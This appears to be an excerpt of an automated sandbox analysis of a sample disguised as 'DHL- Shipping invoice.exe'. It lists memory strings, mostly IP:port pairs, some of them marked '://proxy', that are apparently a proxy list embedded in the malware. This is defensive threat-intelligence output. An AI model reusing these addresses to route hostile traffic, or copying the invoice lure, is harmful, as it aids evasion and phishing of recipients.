                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://194.186.127.60://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://194.186.127.60:80
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://194.226.164.214:1080
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://194.226.164.214:1080://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmp, DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://194.233.78.142:35513
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://194.233.78.142:41720
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://194.233.78.142:41720://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98093E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://194.31.64.44
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98093E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://194.31.64.44://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98093E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://194.31.64.44:80
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98077B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://194.31.79.75:50920
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://194.4.50.61:12334
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://194.4.50.61:12334://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://194.4.50.94:12334
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://194.4.50.94:12334://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://194.44.208.62
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://194.44.208.62://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://194.44.208.62:80
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://194.59.170.116:1080
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://194.59.170.116:1080://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://194.67.91.153
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9811D3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://194.67.91.153://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9811D3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://194.67.91.153:80
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://195.138.90.
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://195.138.90.226:3128
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://195.138.90.226:3128://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://195.154.172.161:3128
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9811D3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://195.154.243.38:49685
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://195.158.18.236:3128
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://195.158.18.236:3128://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://195.169.35.
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://195.169.35.214:3128
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://195.169.35.214:3128://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://195.177.217.131
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://195.177.217.131:23380
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://195.177.217.131:23380://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980135000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://195.177.217.131:31490
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980135000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://195.177.217.131:31490://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9804DD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://195.177.217.131:58053
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9804DD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://195.177.217.131:58053://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmp, DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://195.177.217.131:63643
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://195.177.217.131:63643://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://195.178.197.71:1080
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://195.178.197.71:1080://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://195.178.33.86:8080
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://195.178.33.86:8080://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9800C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://195.178.56.33:8080
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9800C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://195.178.56.33:8080://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98114F000.00000004.00000800.00020000.00000000.sdmp, DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://195.211.244.190:3629
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98114F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://195.211.244.190:3629://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98077B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://195.248.243.149:7237://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9809E2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://195.35.25.94
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://195.35.25.94://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://195.35.25.94:80
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://195.35.32.249://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://195.98.74.57:1080
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://195.98.74.57:1080://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://196.1.95.124
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://196.1.95.124://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://196.1.95.124:80
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://196.2.13.12:4153
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://196.2.13.12:4153://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://196.202.210
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://196.202.210.73:32650
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://196.202.210.73:32650://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://196.216.11.135:4673
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://196.216.11.135:4673://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://196.223.129.21
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://196.223.129.21://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://196.223.129.21:80
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://196.251.222.221:8104
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://196.251.222.221:8104://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://196.251.223.54:8104
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://196.251.223.54:8104://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmp, DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981F9F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://196.29.231.1:4145
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://196.29.231.1:4145://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://197.211.24.206:5678
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://197.232.36.85:41890
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://197.232.36.85:41890://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9809E2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://197.232.47.122:8080
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9809E2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://197.232.47.122:8080://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://197.232.65.40:55443
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://197.232.65.40:55443://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://197.234.13.
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://197.234.13.46:4145
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://197.234.13.46:4145://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://197.234.13.52:36902
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://197.234.13.52:36902://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmp, DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981ED2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://197.234.13.54:4145
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://197.234.13.54:4145://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmp, DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9815EF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://197.234.13.57:4145
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98333F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://197.234.13.57:4145://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9804DD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://197.242.146.109:3128
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9804DD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://197.242.146.109:3128://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://197.243.20.178
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://197.243.20.178://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://197.243.20.178:80
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9804DD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://197.254.84.86:32650
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9804DD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://197.254.84.86:32650://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://198.0.198.132:54321
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://198.0.198.132:54321://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://198.12.253.1:62302
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://198.12.253.1:62302://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://198.12.255.193:32216
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://198.12.255.193:32216://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://198.12.255.193:45274
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://198.12.255.193:45274://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9809E2000.00000004.00000800.00020000.00000000.sdmp, DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://198.12.255.193:63761
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://198.12.255.193:63761://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://198.168.189.54://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://198.199.86.
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://198.199.86.11:8080
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://198.199.86.11:8080://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://198.23.143.
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://198.23.143.24:6969
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://198.23.143.24:6969://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98333F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://198.49.68.80
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://198.49.68.80://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://198.49.68.80:80
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://198.57.195.
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://198.57.195.42:31683
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://198.57.195.42:31683://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://198.57.211.235:11096
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://198.57.211.235:11096://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://198.74.51.79:8888
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://198.74.51.79:8888://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://198.8.94.17
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980BB4000.00000004.00000800.00020000.00000000.sdmp, DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9806B0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://198.8.94.174:39078
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98061D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://198.8.94.174:39078://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://199.102.105.242:4145
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://199.102.105.242:4145://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://199.102.106.94:4145
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://199.102.106.94:4145://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmp, DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://199.102.107.145:4145
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://199.102.107.145:4145://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9804DD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://199.116.114.11:4145
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9804DD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://199.116.114.11:4145://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://199.187.210.54:4145://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://199.229.254
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98093E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://199.229.254.129:4145
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98093E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://199.229.254.129:4145://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://199.91.
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://199.91.79.58:999
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://199.91.79.58:999://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98333F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://2.10.247.133
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98333F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://2.10.247.133://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98333F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://2.10.247.133:80
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://2.179.193.146:3128
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://2.179.193.146:3128://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9804DD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://2.35.9.104
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9804DD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://2.35.9.104://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9804DD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://2.35.9.104:80
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://20.111.54.16
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://20.111.54.16://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://20.111.54.16:80
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98047C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://20.111.54.16:8123
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98047C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://20.111.54.16:8123://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://20.204.190.254:3129
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmp, DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://20.204.212.
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://20.204.212.45:3129
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://20.204.212.45:3129://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://20.204.212.76:3129
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://20.204.212.76:3129://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://20.204.214.23:3129
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://20.204.214.23:3129://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://20.205.115.87:8080
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://20.205.115.87:8080://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980490000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://20.205.61.143:80
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://20.205.61.143:8123
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://20.205.61.143:8123://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://20.206.106.192
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://20.206.106.192://proxy
